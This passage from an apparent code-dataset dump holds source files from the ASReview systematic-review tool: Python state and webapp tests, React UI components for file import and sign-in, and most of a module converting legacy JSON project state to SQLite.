TEST_POOL_START\n assert labeled[\"record_id\"].to_list() == TEST_RECORD_IDS\n assert labeled[\"label\"].to_list() == TEST_LABELS\n\n\ndef test_last_ranking(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n\n record_ids = [1, 2, 3, 4, 5, 6]\n ranking = [1, 3, 4, 6, 2, 5]\n classifier = \"nb\"\n query_strategy = \"max\"\n balance_strategy = \"double\"\n feature_extraction = \"tfidf\"\n training_set = 2\n\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_ids)\n state.add_last_ranking(\n ranking,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n )\n\n last_ranking = state.get_last_ranking()\n assert isinstance(last_ranking, pd.DataFrame)\n assert list(last_ranking.columns) == [\n \"record_id\",\n \"ranking\",\n \"classifier\",\n \"query_strategy\",\n \"balance_strategy\",\n \"feature_extraction\",\n \"training_set\",\n \"time\",\n ]\n\n assert last_ranking[\"ranking\"].to_list() == [0, 1, 2, 3, 4, 5]\n assert 
last_ranking[\"record_id\"].to_list() == ranking\n assert last_ranking[\"classifier\"].to_list() == [classifier] * len(record_ids)\n\n\ndef test_get_pool():\n with open_state(TEST_STATE_FP) as state:\n pool = state.get_pool()\n\n assert isinstance(pool, pd.Series)\n assert len(pool) == 841\n assert pool[:10].to_list() == TEST_POOL_START\n\n\ndef test_get_labeled():\n with open_state(TEST_STATE_FP) as state:\n labeled = state.get_labeled()\n\n assert isinstance(labeled, pd.DataFrame)\n assert labeled[\"record_id\"].to_list() == TEST_RECORD_IDS\n assert labeled[\"label\"].to_list() == TEST_LABELS\n\n\ndef test_add_extra_column(tmpdir):\n \"\"\"Check if state still works with extra colums added to tables.\"\"\"\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n\n with open_state(project_path, read_only=False) as state:\n con = state._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"ALTER TABLE last_ranking ADD COLUMN test_lr INTEGER;\")\n cur.execute(\"ALTER TABLE results ADD COLUMN test_res INTEGER;\")\n con.commit()\n con.close()\n\n record_ids = [1, 2, 3, 4, 5, 6]\n ranking = [1, 3, 4, 6, 2, 5]\n classifier = \"nb\"\n query_strategy = \"max\"\n balance_strategy = \"double\"\n feature_extraction = \"tfidf\"\n training_set = 2\n\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_ids)\n state.add_last_ranking(\n ranking,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n )\n\n top_ranked = state.query_top_ranked(1)\n pool, labeled, pending = state.get_pool_labeled_pending()\n assert len(pending) == 1\n assert len(pool) == len(record_ids) - 1\n assert len(labeled) == 0\n\n state.add_labeling_data(top_ranked, [0 for _ in top_ranked])\n pool, labeled, pending = state.get_pool_labeled_pending()\n assert len(pending) == 0\n assert len(pool) == len(record_ids) - 1\n assert len(labeled) == 1\n" }, { "alpha_fraction": 0.6526492834091187, "alphanum_fraction": 0.6576955318450928, "avg_line_length": 30.289474487304688, "blob_id": "34274fbbc6540e2a420c13958a8790fcac65d553", "content_id": "f27948141b7b5e5619229a081fd17e870a760ae1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1189, "license_type": "permissive", "max_line_length": 81, "num_lines": 38, "path": "/asreview/webapp/tests/test_api/test_webapp.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from flask import current_app\n\nimport asreview.webapp.tests.utils.api_utils as au\nfrom asreview.webapp.tests.utils import misc\n\n\n# Test if index.html is available!\n# Note: This test will fail if build is missing. 
Please run\n# \`python setup.py compile_assets\` first.\ndef test_landing(setup):\n    client, _, _ = setup\n\n    status_code, _, html = au.call_root_url(client)\n    assert status_code == 200\n    assert (\n        \"<title>ASReview LAB - A tool for AI-assisted systematic reviews</title>\"\n        in html\n    )  # noqa\n\n\n# Test boot data!\ndef test_boot(setup_all_clients):\n    status_code, data = au.call_boot_url(setup_all_clients)\n    assert status_code == 200\n    assert isinstance(data, dict)\n    assert \"authentication\" in data.keys()\n    assert \"status\" in data.keys()\n    assert \"version\" in data.keys()\n    if misc.current_app_is_authenticated():\n        assert data[\"authentication\"]\n        assert data[\"allow_account_creation\"] == current_app.config.get(\n            \"ALLOW_ACCOUNT_CREATION\"\n        )\n        assert data[\"email_verification\"] == current_app.config.get(\n            \"EMAIL_VERIFICATION\", False\n        )\n    else:\n        assert not data[\"authentication\"]\n" }, { "alpha_fraction": 0.5275911688804626, "alphanum_fraction": 0.5417466163635254, "avg_line_length": 22.548023223876953, "blob_id": "b1e5cf3a70e60485fe8107011f6597566c4cd7c1", "content_id": "46264ee9adcb84a5e37a1ee8aa6540ccbad16ade", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4168, "license_type": "permissive", "max_line_length": 79, "num_lines": 177, "path": "/asreview/webapp/src/ProjectComponents/ImportFromFile.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React, { useCallback, useMemo } from \"react\";\nimport { useDropzone } from \"react-dropzone\";\nimport {\n  Avatar,\n  Box,\n  Button,\n  ButtonBase,\n  Stack,\n  Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { FileUpload } from \"@mui/icons-material\";\n\nimport { InlineErrorHandler } from \"../Components\";\n\nconst PREFIX = \"ImportFromFile\";\n\nconst classes = {\n  root: \`${PREFIX}-root\`,\n  singleLine: \`${PREFIX}-single-line\`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n  height: \"100%\",\n  width: \"100%\",\n  [\`& .${classes.root}\`]: {\n    display: \"flex\",\n    alignItems: \"center\",\n  },\n\n  [\`& .${classes.singleLine}\`]: {\n    display: \"-webkit-box\",\n    WebkitBoxOrient: \"vertical\",\n    WebkitLineClamp: 1,\n    whiteSpace: \"pre-line\",\n    overflow: \"hidden\",\n  },\n}));\n\nconst baseStyle = {\n  height: \"100%\",\n  flex: 1,\n  display: \"flex\",\n  flexDirection: \"column\",\n  alignItems: \"center\",\n  justifyContent: \"center\",\n  padding: \"80px 20px 80px 20px\",\n  borderWidth: 2,\n  borderRadius: 2,\n  borderColor: \"#eeeeee\",\n  borderStyle: \"dashed\",\n  outline: \"none\",\n  transition: \"border .24s ease-in-out\",\n};\n\nconst activeStyle = {\n  borderColor: \"#2196f3\",\n};\n\nconst acceptStyle = {\n  borderColor: \"#00e676\",\n};\n\nconst rejectStyle = {\n  borderColor: \"#ff1744\",\n};\n\nconst ImportFromFile = ({\n  acceptFormat,\n  addFileError,\n  file,\n  setFile,\n  isAddFileError,\n  isAddingFile,\n  reset,\n}) => {\n  const onDrop = useCallback(\n    (acceptedFiles) => {\n      if (acceptedFiles.length !== 1) {\n        console.log(\"No valid file provided\");\n        return;\n      }\n\n      // reset a previous add-file error before retrying\n      if (isAddFileError) {\n        reset();\n      }\n      // set the state such that we can upload the file\n      setFile(acceptedFiles[0]);\n    },\n    [setFile, isAddFileError, reset],\n  );\n\n  const {\n    getRootProps,\n    getInputProps,\n    isDragActive,\n    isDragAccept,\n    isDragReject,\n    open,\n  } = useDropzone({\n    onDrop: !isAddingFile ? 
onDrop : false,\n multiple: false,\n noClick: true,\n accept: acceptFormat,\n });\n\n const style = useMemo(\n () => ({\n ...baseStyle,\n ...(isDragActive ? activeStyle : {}),\n ...(isDragAccept ? acceptStyle : {}),\n ...(isDragReject ? rejectStyle : {}),\n }),\n [isDragActive, isDragReject, isDragAccept],\n );\n\n const returnAcceptFile = () => {\n if (acceptFormat !== \".asreview\") {\n return <Typography>Drag and drop a dataset file to add</Typography>;\n } else {\n return (\n <Typography>\n Drag and drop a project file (<code>.asreview</code>) to add\n </Typography>\n );\n }\n };\n\n return (\n <Root>\n <Box {...getRootProps({ style })}>\n <input {...getInputProps()} />\n <Stack className={classes.root} spacing={2}>\n <ButtonBase disabled={isAddingFile} disableRipple onClick={open}>\n <Avatar\n sx={{\n height: \"136px\",\n width: \"136px\",\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.800\" : \"grey.100\",\n }}\n >\n <FileUpload\n sx={{ height: \"65px\", width: \"65px\", color: \"grey.500\" }}\n />\n </Avatar>\n </ButtonBase>\n {returnAcceptFile()}\n {file && (\n <Typography className={classes.singleLine}>\n File <i>{file?.path}</i> selected.\n </Typography>\n )}\n {isAddingFile && acceptFormat === \".asreview\" && (\n <Typography sx={{ color: \"text.secondary\" }}>\n Importing...\n </Typography>\n )}\n {isAddingFile && acceptFormat !== \".asreview\" && (\n <Typography sx={{ color: \"text.secondary\" }}>Adding...</Typography>\n )}\n {isAddFileError && (\n <InlineErrorHandler\n message={addFileError?.message + \" Please try again.\"}\n />\n )}\n <Button disabled={isAddingFile} variant=\"contained\" onClick={open}>\n Select File\n </Button>\n </Stack>\n </Box>\n </Root>\n );\n};\n\nexport default ImportFromFile;\n" }, { "alpha_fraction": 0.5340531468391418, "alphanum_fraction": 0.5448504686355591, "avg_line_length": 25.461538314819336, "blob_id": "e3433e42ef45617c15506fdd29ee0275dbd9859c", "content_id": "82007e716ad44a2ef1b737b60bc0a17776150e6a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2408, "license_type": "permissive", "max_line_length": 80, "num_lines": 91, "path": "/asreview/webapp/src/Components/SignIn.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useSelector } from \"react-redux\";\nimport { Box, Card, CardContent, Fade, Stack, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { HelpPrivacyTermsButton, SignInForm } from \"../Components\";\n\nimport { WordmarkState } from \"../globals\";\nimport SignInOAuth from \"./SignInOAuth\";\n\nconst PREFIX = \"SignInForm\";\n\nconst classes = {\n button: `${PREFIX}-button`,\n card: `${PREFIX}-card`,\n cardContent: `${PREFIX}-card-content`,\n checkbox: `${PREFIX}-checkbox`,\n header: `${PREFIX}-header`,\n logo: `${PREFIX}-logo`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n height: \"100%\",\n width: \"100%\",\n alignItems: \"center\",\n justifyContent: \"center\",\n position: \"absolute\",\n [`& .${classes.button}`]: {\n paddingTop: theme.spacing(3),\n paddingBottom: theme.spacing(3),\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.card}`]: {\n borderRadius: theme.spacing(2),\n width: \"450px\",\n },\n\n [`& .${classes.cardContent}`]: {\n padding: \"48px 40px\",\n },\n\n [`& .${classes.header}`]: {\n alignItems: \"center\",\n },\n\n [`& .${classes.logo}`]: {\n width: \"100%\",\n 
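// cap the wordmark width inside the sign-in card\n    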
maxWidth: \"130px\",\n },\n}));\n\nconst SignIn = () => {\n const oAuthData = useSelector((state) => state.oAuthData);\n const allowAccountCreation =\n useSelector((state) => state.allow_account_creation) || false;\n\n return (\n <Root>\n <Fade in>\n <Box>\n <Card className={classes.card} variant=\"outlined\">\n <CardContent className={classes.cardContent}>\n <Stack spacing={3}>\n <Stack className={classes.header} spacing={2}>\n <img\n className={classes.logo}\n src={WordmarkState()}\n alt=\"ASReview LAB\"\n />\n <Typography variant=\"h5\">Sign in</Typography>\n </Stack>\n <SignInForm\n classes={classes}\n allowAccountCreation={allowAccountCreation}\n />\n {Object.keys(oAuthData.services).length > 0 && (\n <SignInOAuth classes={classes} oAuthData={oAuthData} />\n )}\n </Stack>\n </CardContent>\n </Card>\n <HelpPrivacyTermsButton />\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default SignIn;\n" }, { "alpha_fraction": 0.6337579488754272, "alphanum_fraction": 0.6401273608207703, "avg_line_length": 23.153846740722656, "blob_id": "053c785512d57a63baed0cd7eddc7d3f098d4cca", "content_id": "fbfbab0cfe09061775193f1873d021f1026d88c9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 314, "license_type": "permissive", "max_line_length": 68, "num_lines": 13, "path": "/asreview/webapp/src/StyledComponents/StyledAlert.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Alert } from \"@mui/material\";\n\nexport function ExplorationModeRecordAlert(props) {\n return (\n <Alert\n severity=\"info\"\n sx={{ borderBottomRightRadius: 0, borderBottomLeftRadius: 0 }}\n >\n {`Labeled as ${props.label} in the dataset`}\n </Alert>\n );\n}\n" }, { "alpha_fraction": 0.620782732963562, "alphanum_fraction": 0.6288799047470093, "avg_line_length": 20.171428680419922, "blob_id": "1612e8a31b76fce69189c1d8d9635c6e13d37cd8", "content_id": "f50bcddb58e7be1884d5bb9b8ce216d5419b2d11", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 741, "license_type": "permissive", "max_line_length": 71, "num_lines": 35, "path": "/asreview/webapp/src/StyledComponents/StyledTypography.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Typography } from \"@mui/material\";\n\nexport function TypographyH5Medium(props) {\n return (\n <Typography\n variant=\"h5\"\n sx={{ fontWeight: (theme) => theme.typography.fontWeightMedium }}\n >\n {props.children}\n </Typography>\n );\n}\n\nexport function TypographyH6Medium(props) {\n return (\n <Typography\n variant=\"h6\"\n sx={{ fontWeight: (theme) => theme.typography.fontWeightMedium }}\n >\n {props.children}\n </Typography>\n );\n}\n\nexport function TypographySubtitle1Medium(props) {\n return (\n <Typography\n variant=\"subtitle1\"\n sx={{ fontWeight: (theme) => theme.typography.fontWeightMedium }}\n >\n {props.children}\n </Typography>\n );\n}\n" }, { "alpha_fraction": 0.5750090479850769, "alphanum_fraction": 0.5774024724960327, "avg_line_length": 31.421669006347656, "blob_id": "53cfe418d6abd762d4e840e7fb0820c508ac3c9a", "content_id": "4379d684cdcdfab2d5982dd1086be07224e690c0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22144, "license_type": "permissive", "max_line_length": 88, "num_lines": 683, "path": "/asreview/state/sql_converter.py", 
"repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport shutil\nimport sqlite3\nimport time\nfrom base64 import b64decode\nfrom datetime import datetime\nfrom io import BytesIO\nfrom pathlib import Path\nfrom uuid import uuid4\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import issparse\nfrom scipy.sparse import load_npz\nfrom scipy.sparse import save_npz\n\nfrom asreview._version import get_versions\nfrom asreview.state.errors import StateError\nfrom asreview.state.legacy.utils import open_state as open_state_legacy\n\nSQLSTATE_VERSION = \"1.0\"\nASREVIEW_FILE_EXTENSION = \".asreview\"\n\n\nclass StateConversionException(Exception):\n pass\n\n\ndef is_old_project(fp):\n \"\"\"Check if state file is old version.\"\"\"\n if Path(fp, \"reviews\").is_dir():\n return False\n else:\n return True\n\n\ndef get_old_project_status(config):\n # project is marked as finished\n if config.get(\"reviewFinished\", False):\n return \"finished\"\n\n # project init is not ready\n if \"projectInitReady\" in config and not config[\"projectInitReady\"]:\n return \"setup\"\n\n # project init flag is not available\n if \"projectInitReady\" not in config:\n if \"projectHasPriorKnowledge\" in config:\n if config[\"projectHasPriorKnowledge\"]:\n return \"review\"\n else:\n return \"setup\"\n\n return \"review\"\n\n\ndef decode_feature_matrix(jsonstate, data_hash):\n \"\"\"Get the feature matrix from a json state as a scipy csr_matrix.\"\"\"\n my_data = jsonstate._state_dict[\"data_properties\"][data_hash]\n encoded_X = my_data[\"feature_matrix\"]\n matrix_type = my_data[\"matrix_type\"]\n if matrix_type == \"ndarray\":\n return csr_matrix(encoded_X)\n elif matrix_type == \"csr_matrix\":\n with BytesIO(b64decode(encoded_X)) as f:\n return load_npz(f)\n return encoded_X\n\n\ndef upgrade_asreview_project_file(fp, from_version=0, to_version=1):\n \"\"\"Convert an old asreview project folder to the new format.\n\n Arguments\n ---------\n fp: str/path\n Location of the (unzipped) project file.\n\n Returns\n -------\n Converts the data in the project to the new format\n and adds it to the folder in place.\"\"\"\n\n if from_version != 0 and to_version != 1:\n raise ValueError(\n f\"Not possible to upgrade from v{from_version} to v{to_version}.\"\n )\n\n # Check if it is indeed an old format project.\n if not is_old_project(fp):\n raise ValueError(\n f\"There already is a 'reviews' folder at {fp}. 
\"\n f\"This project seems to be in new format.\"\n )\n\n # Current Paths\n fp = Path(fp)\n legacy_fp = Path(fp, \"legacy\")\n move_old_files_to_legacy_folder(fp)\n\n try:\n # Current paths.\n json_fp = Path(legacy_fp, \"result.json\")\n labeled_json_fp = Path(legacy_fp, \"labeled.json\")\n pool_fp = Path(legacy_fp, \"pool.json\")\n kwargs_fp = Path(legacy_fp, \"kwargs.json\")\n review_id = str(uuid4().hex)\n\n # Create the reviews folder and the paths for the results and settings.\n Path(fp, \"reviews\", review_id).mkdir(parents=True)\n sql_fp = str(Path(fp, \"reviews\", review_id, \"results.sql\"))\n settings_metadata_fp = Path(fp, \"reviews\", review_id, \"settings_metadata.json\")\n\n # Create the path for the feature matrix.\n\n # Create sqlite table with the results of the review.\n convert_json_results_to_sql(sql_fp, json_fp, labeled_json_fp)\n\n # Create sqlite tables 'last_probabilities'.\n convert_json_last_probabilities(sql_fp, json_fp)\n\n # Create the table for the last ranking of the model.\n create_last_ranking_table(sql_fp, pool_fp, kwargs_fp, json_fp)\n\n # Add the record table to the sqlite database as the table 'record_table'.\n convert_json_record_table(sql_fp, json_fp)\n\n # Create decision changes table.\n create_decision_changes_table(sql_fp)\n\n # Create json for settings.\n convert_json_settings_metadata(settings_metadata_fp, json_fp)\n\n # Create file for the feature matrix.\n with open(kwargs_fp, \"r\") as f:\n kwargs_dict = json.load(f)\n feature_extraction_method = kwargs_dict[\"feature_extraction\"]\n feature_matrix_fp = convert_json_feature_matrix(\n fp, json_fp, feature_extraction_method\n )\n\n # --- Upgrade the project.json file.\n\n # extract the start time from the state json\n with open(json_fp, \"r\") as f:\n start_time = json.load(f)[\"time\"][\"start_time\"]\n start_time = datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S.%f\")\n\n # open the project json and upgrade\n with open(Path(fp, \"project.json\"), \"r\") as f:\n project_config_old = json.load(f)\n\n project_config_new = upgrade_project_config(\n project_config_old,\n review_id,\n start_time,\n Path(feature_matrix_fp).name,\n feature_extraction_method,\n )\n\n # dump the project json\n with open(Path(fp, \"project.json\"), \"w\") as f:\n json.dump(project_config_new, f)\n except Exception as e:\n rollback_conversion(fp, check_is_converted=False)\n raise StateConversionException(\n f\"An error occurred during conversion of state \"\n f\"from {from_version} to {to_version}.\"\n ) from e\n\n\ndef move_old_files_to_legacy_folder(fp):\n \"\"\"Move the old files to a legacy folder.\n\n Arguments\n ----------\n fp: pathlib.Path\n Location of the (unzipped) project file.\n\n Returns\n -------\n Creates a folder 'legacy' in the project file, moves all current files to\n this legacy folder, and keeps a copy of 'project.json' and the data folder\n at the original place.\n \"\"\"\n\n project_content = list(fp.iterdir())\n\n # copy to legacy folder\n shutil.copytree(fp, Path(fp, \"legacy\"))\n\n # remove files and folders\n files_to_keep = [\"project.json\", \"data\", \"lock.sqlite\"]\n\n for f in project_content:\n if f.name not in files_to_keep:\n if f.is_file():\n f.unlink()\n elif f.is_dir():\n shutil.rmtree(f)\n else:\n pass\n\n\ndef upgrade_project_config(\n config,\n review_id=None,\n start_time=None,\n feature_matrix_name=None,\n feature_extraction_method=None,\n):\n \"\"\"Update the project.json file to contain the review information , the\n feature matrix information and the new state version 
number.\n\n    Arguments\n    ---------\n    config: dict\n        Contents of the project json file.\n    review_id: str\n        Identifier of the review.\n    start_time: str\n        String containing start time of the review.\n    feature_matrix_name: str\n        Filename of the feature matrix.\n    feature_extraction_method: str\n        Name of the feature extraction method.\n    \"\"\"\n\n    start_time_s = str(start_time) if start_time else None\n\n    # Add the review information.\n    config[\"reviews\"] = [\n        {\n            \"id\": review_id,\n            \"start_time\": start_time_s,\n            \"status\": get_old_project_status(config),\n        }\n    ]\n\n    # Add the feature matrix information.\n    config[\"feature_matrices\"] = [\n        {\"id\": feature_extraction_method, \"filename\": feature_matrix_name}\n    ]\n\n    # Add the project mode.\n    config[\"mode\"] = config.get(\"mode\", \"oracle\")\n\n    # Update the state version.\n    config[\"version\"] = get_versions()[\"version\"]\n    config[\"state_version\"] = SQLSTATE_VERSION\n\n    # set created_at_unix to start time (empty: None)\n    if \"created_at_unix\" not in config:\n        try:\n            config[\"created_at_unix\"] = time.mktime(start_time.timetuple())\n        except Exception:\n            config[\"created_at_unix\"] = None\n\n    config[\"datetimeCreated\"] = start_time_s\n\n    # delete deprecated metadata\n    config.pop(\"projectInitReady\", None)\n    config.pop(\"projectHasPriorKnowledge\", None)\n    config.pop(\"projectHasDataset\", None)\n\n    return config\n\n\ndef convert_json_settings_metadata(fp, json_fp):\n    \"\"\"Get the settings and metadata from a json state and save it as\n    a json file at the location given by fp.\n\n    Arguments\n    ---------\n    fp: str/path\n        Path where to save the json file.\n    json_fp: str/path\n        Path to the json state file.\n    \"\"\"\n    data_dict = {}\n    with open_state_legacy(json_fp) as json_state:\n        data_dict[\"settings\"] = json_state._state_dict[\"settings\"]\n        # The 'triple' balance strategy is no longer implemented.\n        if data_dict[\"settings\"][\"balance_strategy\"] == \"triple\":\n            data_dict[\"settings\"][\"balance_strategy\"] = \"double\"\n        data_dict[\"state_version\"] = SQLSTATE_VERSION\n        data_dict[\"software_version\"] = json_state._state_dict[\"software_version\"]\n        data_dict[\"model_has_trained\"] = True\n\n    # remove the outdated mode\n    data_dict.pop(\"mode\", None)\n\n    with open(fp, \"w\") as f:\n        json.dump(data_dict, f)\n\n\ndef create_last_ranking_table(sql_fp, pool_fp, kwargs_fp, json_fp):\n    \"\"\"Create the table which will contain the ranking of the last iteration of\n    the model.\n\n    Arguments\n    ---------\n    sql_fp: str/path\n        Path where to save the last_ranking table. 
Should be a .sql file.\n \"\"\"\n\n with open(pool_fp) as f_pool:\n pool_ranking = json.load(f_pool)\n\n with open(kwargs_fp, \"r\") as f_kwargs:\n kwargs_dict = json.load(f_kwargs)\n\n # Add the record_ids not found in the pool to the end of the ranking.\n with open_state_legacy(json_fp) as json_state:\n record_table = get_json_record_table(json_state)\n records_not_in_pool = [\n record_id for record_id in record_table if record_id not in pool_ranking\n ]\n pool_ranking += records_not_in_pool\n\n # Convert the records in the pool to the new record ids (starting from 0).\n old_to_new_record_ids = {old_id: idx for idx, old_id in enumerate(record_table)}\n pool_ranking = [old_to_new_record_ids[record] for record in pool_ranking]\n\n # Set the training set to -1 (prior) for records from old pool.\n training_set = -1\n time = None\n\n last_ranking = [\n (\n v,\n i,\n kwargs_dict[\"model\"],\n kwargs_dict[\"query_strategy\"],\n kwargs_dict[\"balance_strategy\"],\n kwargs_dict[\"feature_extraction\"],\n training_set,\n time,\n )\n for i, v in enumerate(pool_ranking)\n ]\n\n with sqlite3.connect(sql_fp) as con:\n cur = con.cursor()\n\n # Create the last_ranking table.\n cur.execute(\n \"\"\"CREATE TABLE last_ranking\n (record_id INTEGER,\n ranking INT,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n time INTEGER)\"\"\"\n )\n cur.executemany(\n \"\"\"INSERT INTO last_ranking VALUES\n (?, ?, ?, ?, ?, ?, ?, ?)\"\"\",\n last_ranking,\n )\n con.commit()\n\n\ndef convert_json_last_probabilities(sql_fp, json_fp):\n \"\"\"Get the last ranking from a json state and save it as the table\n 'last_probabilities' in the .sql file at the location of sql_fp.\n\n Arguments\n ---------\n sql_fp: str/path\n Path where to save the record table. Should be a .sql file.\n json_fp: str/path\n Path to the json state file.\n \"\"\"\n with open_state_legacy(json_fp) as json_state:\n # Get the last predicted probabilities from the state file.\n # Also get the number of record labeled and the classifier.\n last_probabilities = json_state.pred_proba\n\n # Put them in the format for input in the sqlite database.\n last_probabilities = [(proba,) for proba in last_probabilities]\n\n with sqlite3.connect(sql_fp) as con:\n cur = con.cursor()\n cur.execute(\n \"\"\"CREATE TABLE last_probabilities\n (proba REAL)\"\"\"\n )\n cur.executemany(\n \"\"\"INSERT INTO last_probabilities VALUES\n (?)\"\"\",\n last_probabilities,\n )\n\n con.commit()\n\n\ndef get_json_state_data_hash(json_state):\n \"\"\"Get the data hash from a json state.\"\"\"\n return list(json_state._state_dict[\"data_properties\"].keys())[0]\n\n\ndef get_json_record_table(json_state):\n \"\"\"Get the record table from a json state.\"\"\"\n data_hash = get_json_state_data_hash(json_state)\n record_table = json_state._state_dict[\"data_properties\"][data_hash][\"record_table\"]\n return record_table\n\n\ndef convert_json_feature_matrix(fp, json_fp, feature_extraction_method):\n \"\"\"Get the feature matrix from a json state file. Save it in the feature\n matrices folder. 
Format is .npz if the matrix is sparse and .npy if the\n matrix is dense.\n\n Arguments\n ---------\n fp: str/path\n Project folder.\n json_fp: str/path\n Path to the json state file.\n feature_extraction_method: str\n Name of the feature extraction method.\n\n Returns\n -------\n pathlib.Path\n Path where the feature matrix is saved.\n \"\"\"\n feature_matrices_fp = Path(fp, \"feature_matrices\")\n feature_matrices_fp.mkdir()\n\n with open_state_legacy(json_fp) as json_state:\n data_hash = get_json_state_data_hash(json_state)\n feature_matrix = decode_feature_matrix(json_state, data_hash)\n if issparse(feature_matrix):\n save_fp = Path(\n feature_matrices_fp, f\"{feature_extraction_method}_feature_matrix.npz\"\n )\n save_npz(save_fp, feature_matrix)\n else:\n save_fp = Path(\n feature_matrices_fp, f\"{feature_extraction_method}_feature_matrix.npy\"\n )\n np.save(save_fp, feature_matrix)\n\n return save_fp\n\n\ndef convert_json_record_table(sql_fp, json_fp):\n \"\"\"Get the record table and save as the table 'record_table'\n in the .sql file at results_fp.\n\n Arguments\n ---------\n sql_fp: str/path\n Path where to save the record table. Should be a .sql file.\n json_fp: str/path\n Path to the json state file.\n \"\"\"\n\n with open_state_legacy(json_fp) as json_state:\n record_table = get_json_record_table(json_state)\n\n # Convert record_table to list of tuples.\n record_table = [(record_id,) for record_id in range(len(record_table))]\n\n con = sqlite3.connect(sql_fp)\n cur = con.cursor()\n cur.execute(\n \"\"\"CREATE TABLE record_table\n (record_id INT)\"\"\"\n )\n cur.executemany(\n \"\"\"INSERT INTO record_table VALUES\n (?)\"\"\",\n record_table,\n )\n con.commit()\n con.close()\n\n\ndef convert_json_results_to_sql(sql_fp, json_fp, labeled_json_fp):\n \"\"\"Convert the result of a json state file to a sqlite database.\"\"\"\n with open_state_legacy(json_fp, read_only=True) as sf:\n with sqlite3.connect(sql_fp) as con:\n with open(labeled_json_fp, \"r\") as file:\n labeled_json = json.load(file)\n\n cur = con.cursor()\n\n # Create the results table.\n cur.execute(\n \"\"\"CREATE TABLE results\n (record_id INTEGER,\n label INTEGER,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n labeling_time INTEGER,\n notes TEXT)\"\"\"\n )\n\n record_table = get_json_record_table(sf)\n record_id_to_row_number = {\n record_table[i]: i for i in range(len(record_table))\n }\n old_record_ids = [x[0] for x in labeled_json]\n sf_indices = [\n record_id_to_row_number[record_id] for record_id in old_record_ids\n ]\n\n sf_labels = [x[1] for x in labeled_json]\n\n # query strategy.\n old_query_strategy = [\n sample_data[2]\n for query in range(len(sf._state_dict[\"results\"]))\n for sample_data in sf._state_dict[\"results\"][query][\"labelled\"]\n ]\n\n n_priors = old_query_strategy.count(\"prior\")\n n_records_labeled = len(sf_indices)\n n_non_prior_records = n_records_labeled - n_priors\n\n query_strategy = sf.settings.to_dict()[\"query_strategy\"]\n sf_query_strategy = [\"prior\"] * n_priors + [\n query_strategy\n ] * n_non_prior_records\n\n # classifier.\n classifier = sf.settings.to_dict()[\"model\"]\n sf_classifiers = [None] * n_priors + [\n f\"{classifier}\" for _ in range(n_non_prior_records)\n ]\n\n # training set.\n sf_training_sets = [-1] * n_priors + list(\n range(n_priors, n_records_labeled)\n )\n\n # feature extraction.\n feature_extraction = sf.settings.to_dict()[\"feature_extraction\"]\n sf_feature_extraction = [None] * 
n_priors + [\n                f\"{feature_extraction}\" for _ in range(n_non_prior_records)\n            ]\n\n            # balance strategy.\n            balance_strategy = sf.settings.to_dict()[\"balance_strategy\"]\n            sf_balance_strategy = [None] * n_priors + [\n                f\"{balance_strategy}\" for _ in range(n_non_prior_records)\n            ]\n\n            # Labeling time.\n            sf_time = [0 for _ in range(n_records_labeled)]\n\n            # No notes were saved before.\n            sf_notes = [None for _ in range(n_records_labeled)]\n\n            # Check that all datasets have the same number of entries.\n            lengths = [\n                len(sf_indices),\n                len(sf_labels),\n                len(sf_classifiers),\n                len(sf_training_sets),\n                len(sf_query_strategy),\n                len(sf_time),\n                len(sf_feature_extraction),\n                len(sf_balance_strategy),\n                len(sf_notes),\n            ]\n            if not all([length == n_records_labeled for length in lengths]):\n                raise StateError(\"All datasets should have the same number of entries.\")\n\n            # Create the database rows.\n            db_rows = [\n                (\n                    sf_indices[i],\n                    sf_labels[i],\n                    sf_classifiers[i],\n                    sf_query_strategy[i],\n                    sf_balance_strategy[i],\n                    